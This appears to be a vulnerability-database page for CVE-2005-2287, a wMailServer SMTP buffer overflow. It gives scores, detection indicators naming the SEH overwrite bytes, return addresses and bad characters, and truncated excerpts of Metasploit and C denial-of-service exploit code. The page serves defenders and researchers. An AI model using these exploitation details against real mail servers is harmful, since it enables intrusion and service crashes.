CVE-2005-2287
published 2005-07-18CVE-2005-2287: SoftiaCom wMailServer 1.0 and 2.0 allows remote attackers to cause a denial of service (application crash) via a large TCP packet with a leading space…
PriorityP429medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
56.83%
98.9th percentile
SoftiaCom wMailServer 1.0 and 2.0 allows remote attackers to cause a denial of service (application crash) via a large TCP packet with a leading space, possibly triggering a buffer overflow.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| softiacom | wmailserver | — | — |
| softiacom | wmailserver | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x81\xc4\xff\xef\xff\xff\x44
bytes↗
\xeb\x06
- →Exploit targets SMTP port 25 with a large buffer beginning with a leading space character, followed by ~5115+ bytes of filler, then a SEH overwrite payload, terminated with \r\n\r\n. Detect oversized SMTP banner/greeting-stage TCP payloads with a leading space on port 25. ↗
- →The exploit prepends a stack-pivot stub \x81\xc4\xff\xef\xff\xff\x44 before the encoded payload. Presence of this byte sequence in SMTP traffic on port 25 is a strong indicator of exploitation. ↗
- →The DoS exploit sends a raw buffer of ~539 bytes of 0x41 ('A') characters directly to TCP port 25 without any SMTP command prefix. Monitor for non-SMTP-conformant large payloads of repeated 0x41 bytes on port 25. ↗
- →SEH overwrite exploit uses a short JMP (\xeb\x06) followed by a packed return address. Detect this 6-byte pattern (EB 06 + 4-byte address) within large SMTP payloads as a SEH chain overwrite indicator. ↗
- →Known SEH overwrite return addresses used in exploitation: 0x75022ac4 (Windows 2000), 0x71aa32ad (Windows XP SP0/SP1), 0x776a1799 (Windows NT 4.0). Flag SMTP payloads containing these 4-byte little-endian values. ↗
- →Bad characters filtered by the exploit encoder are \x00\x0a\x0d\x20 (null, LF, CR, space) plus colon, equals, plus, and double-quote in the older module. Encoded shellcode in exploit traffic will not contain these bytes. ↗
- ·The Metasploit module targets only Windows platforms (win32, winnt, win2000, winxp). The exploit is not applicable to non-Windows deployments of wMailServer. ↗
- ·Payload space is limited to 600 bytes due to buffer constraints; shellcode must fit within this space after encoding. ↗
- ·The exploit uses EXITFUNC=thread, meaning the shellcode exits via thread termination rather than process exit, which may affect post-exploitation stability and detection via process monitoring. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SoftiaCom wMailServer 1.0 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-2287 SoftiaCom wMailServer 1.0 - Remote Buffer Overflow (Metasploit)
SoftiaCom wMailServer 1.0 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: wmailserver.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SoftiaCom WMailserver 1.0 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0
(SMTP) via a SEH frame overwrite.
},
'Author' => [ 'MC' ],
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2005-2287' ],
[ 'OSVDB', '17883' ],
[ 'BID', '14213' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Pl
Exploit-DB
SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)
exploitdb·2006-02-01
CVE-2005-2287 SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)
SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::wmailserver_smtp;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 [at] w00t-shell.net', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp' ],
'Priv' => 0,
'UserOpts' =
Exploit-DB
SoftiaCom wMailServer 1.0 - Remote Denial of Service
exploitdb·2005-07-12
CVE-2005-2287 SoftiaCom wMailServer 1.0 - Remote Denial of Service
SoftiaCom wMailServer 1.0 - Remote Denial of Service
---
/*****************************************************************
wMailServer Remote D.o.S Exploit by Kozan
Application: wMailServer
Vendor: Softiacom Software - www.softiacom.com
Discovered by: fRoGGz - SecuBox Labs
Exploit Coded by: Kozan
Credits to ATmaCA, fRoGGz, SecuBox Labs
Web: www.spyinstructors.com
Mail: [email protected]
*****************************************************************/
#include
#include
#include
#pragma comment(lib,"ws2_32.lib")
char Buff[] =
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\
Metasploit
SoftiaCom WMailserver 1.0 Buffer Overflow
metasploit
SoftiaCom WMailserver 1.0 Buffer Overflow
SoftiaCom WMailserver 1.0 Buffer Overflow
This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0 (SMTP) via a SEH frame overwrite.
No writeups or analysis indexed.
2005-07-18
Published